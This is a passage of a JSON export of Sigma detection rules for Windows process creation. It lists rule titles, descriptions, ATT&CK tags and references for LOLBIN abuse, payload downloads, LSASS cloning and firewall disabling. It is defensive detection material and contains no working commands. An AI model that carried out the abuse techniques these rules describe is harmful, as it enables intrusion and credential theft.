"https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", - "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", - "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/02/24", - "filename": "proc_creation_win_susp_finger_usage.yml", - "author": "Florian Roth, omkar72, oscd.community", - "level": "high", - "falsepositive": [ - "Admin activity (unclear what they do nowadays with finger.exe)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "value": "Format.com FileSystem LOLBIN", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1477925112561209344", - "https://twitter.com/wdormann/status/1478011052130459653?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_susp_format.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "uuid": "add64136-62e5-48ea-807e-88638d02df1e", - "value": "Fsutil Suspicious Invocation", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2019/09/26", - "filename": "proc_creation_win_susp_fsutil_usage.yml", - "author": "Ecco, E.M. Anhaus, oscd.community", - "level": "high", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", - "value": "Gpresult Display Group Policy Information", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", - "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1615" - ], - "creation_date": "2022/05/01", - "filename": "proc_creation_win_susp_gpresult.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a scheduled task with a GUID like name", - "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", - "value": "Suspicious Scheduled Task Name As GUID", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_guid_task_name.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/10/31", - "filename": "proc_creation_win_susp_guid_task_name.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate software naming their tasks as GUIDs" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", - "value": "Suspicious GUP Usage", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2019/02/06", - "filename": "proc_creation_win_susp_gup.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", - "value": "Download Files Using Notepad++ GUP Utility", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1535322182863179776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/06/10", - "filename": "proc_creation_win_susp_gup_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", - "uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43", - "value": "Execute Arbitrary Binaries Using GUP Utility", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1535322445439180803", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/06/10", - "filename": "proc_creation_win_susp_gup_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Other parent binaries using GUP not currently identified" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use of hostname to get information", - "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", - "value": "Suspicious Execution of Hostname", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hostname.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_hostname.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "value": "Suspicious IIS Module Registration", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml" - ], - "tags": "No established tags", - "creation_date": "2022/08/04", - "filename": "proc_creation_win_susp_iis_module_registration.yml", - "author": "Florian Roth (rule), Microsoft (idea)", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1", - "value": "Execution Of Non-Existing File", - "meta": { - "refs": [ - "https://pentestlaboratories.com/2021/12/08/process-ghosting/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/12/09", - "filename": "proc_creation_win_susp_image_missing.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", - "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", - "value": "Suspicious Execution of InstallUtil Without Log", - "meta": { - "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/23", - "filename": "proc_creation_win_susp_instalutil.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", - "value": "Suspicious Invoke-WebRequest Usage", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/08/02", - "filename": "proc_creation_win_susp_invoke_webrequest_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious IIS native-code module installations via command line", - "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", - "value": "IIS Native-Code Module Command Line Installation", - "meta": { - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2019/12/11", - "filename": "proc_creation_win_susp_iss_module_install.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", - "value": "Suspicious Execution of Shutdown to Log Out", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ], - "creation_date": "2022/10/01", - "filename": "proc_creation_win_susp_logoff.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "value": "Wscript Execution from Non C Drive", - "meta": { - "refs": [ - "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", - "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/10/01", - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml", - "author": "Aaron Herman", - "level": "medium", - "falsepositive": [ - "Legitimate applications installed on other partitions such as \"D:\"" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious LSASS process process clone that could be a sign of process dumping activity", - "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "value": "Suspicious LSASS Process Clone", - "meta": { - "refs": [ - "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", - "https://twitter.com/Hexacorn/status/1420053502554951689", - "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" - ], - "creation_date": "2021/11/27", - "filename": "proc_creation_win_susp_lsass_clone.yml", - "author": "Florian Roth, Samir Bousseaden", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use of reg to get MachineGuid information", - "uuid": "f5240972-3938-4e56-8e4b-e33893176c1f", - "value": "Suspicious Query of MachineGUID", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_machineguid.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_machineguid.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", - "value": "Suspicious Microsoft OneNote Child Process", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" - ], - "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" - ], - "creation_date": "2022/10/21", - "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "File located in the AppData folder with trusted signature" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", - "value": "Missing Space Characters in Command Lines", - "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1562072617552678912", - "https://ss64.com/nt/cmd.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/08/23", - "filename": "proc_creation_win_susp_missing_spaces.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", - "value": "Suspicious Mofcomp Execution", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", - "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/07/12", - "filename": "proc_creation_win_susp_mofcomp_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", - "value": "Mounted Share Deleted", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_win_susp_mounted_share_deletion.yml", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "level": "low", - "falsepositive": [ - "Administrators or Power users may remove their shares via cmd line" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", - "value": "MpiExec Lolbin", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1465058133303246867", - "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", - "value": "Suspicious Msbuild Execution By Uncommon Parent Process", - "meta": { - "refs": [ - "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", - "https://www.echotrail.io/insights/search/msbuild.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/11/17", - "filename": "proc_creation_win_susp_msbuild.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "value": "MSHTA Suspicious Execution 01", - "meta": { - "refs": [ - "http://blog.sevagas.com/?Hacking-around-HTA-files", - "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", - "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", - "https://twitter.com/mattifestation/status/1326228491302563846", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" - ], - "creation_date": "2019/02/22", - "filename": "proc_creation_win_susp_mshta_execution.yml", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious mshta process patterns", - "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "value": "Suspicious MSHTA Process Patterns", - "meta": { - "refs": [ - "https://en.wikipedia.org/wiki/HTML_Application", - "https://www.echotrail.io/insights/search/mshta.exe", - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ], - "creation_date": "2021/07/17", - "filename": "proc_creation_win_susp_mshta_pattern.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "value": "Mshtml DLL RunHTMLApplication Abuse", - "meta": { - "refs": [ - "https://twitter.com/n1nj4sec/status/1421190238081277959", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/14", - "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of msiexec from an uncommon directory", - "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "value": "Suspicious MsiExec Directory", - "meta": { - "refs": [ - "https://twitter.com/200_okay_/status/1194765831911215104", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2019/11/14", - "filename": "proc_creation_win_susp_msiexec_cwd.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious msiexec process starts with web addresses as parameter", - "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", - "value": "MsiExec Web Install", - "meta": { - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2018/02/09", - "filename": "proc_creation_win_susp_msiexec_web_install.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Downloads payload from remote server", - "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", - "value": "Malicious Payload Download via Office Binaries", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", - "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", - "Reegun J (OCBC Bank)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_msoffice.yml", - "author": "Beyu Denis, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", - "value": "Suspicious Netsh Discovery Command", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ], - "creation_date": "2021/12/07", - "filename": "proc_creation_win_susp_netsh_discovery_command.yml", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "low", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects persitence via netsh helper", - "uuid": "56321594-9087-49d9-bf10-524fe8479452", - "value": "Suspicious Netsh DLL Persistence", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", - "https://attack.mitre.org/software/S0108/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.007", - "attack.s0108" - ], - "creation_date": "2019/10/25", - "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", - "author": "Victor Sergeev, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects netsh commands that turns off the Windows firewall", - "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "value": "Firewall Disabled via Netsh", - "meta": { - "refs": [ - "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", - "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" - ], - "creation_date": "2019/11/01", - "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", - "author": "Fatih Sirin", - "level": "medium", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", - "uuid": "37e8d358-6408-4853-82f4-98333fca7014", - "value": "Execution of NetSupport RAT From Unusual Location", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", - "value": "Suspicious Network Command", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ], - "creation_date": "2021/12/07", - "filename": "proc_creation_win_susp_network_command.yml", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "low", - "falsepositive": [ - "Administrator, hotline ask to user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", - "value": "Suspicious Listing of Network Connections", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2021/12/10", - "filename": "proc_creation_win_susp_network_listing_connections.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of Net.exe, whether suspicious or benign.", - "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", - "value": "Net.exe Execution", - "meta": { - "refs": [ - 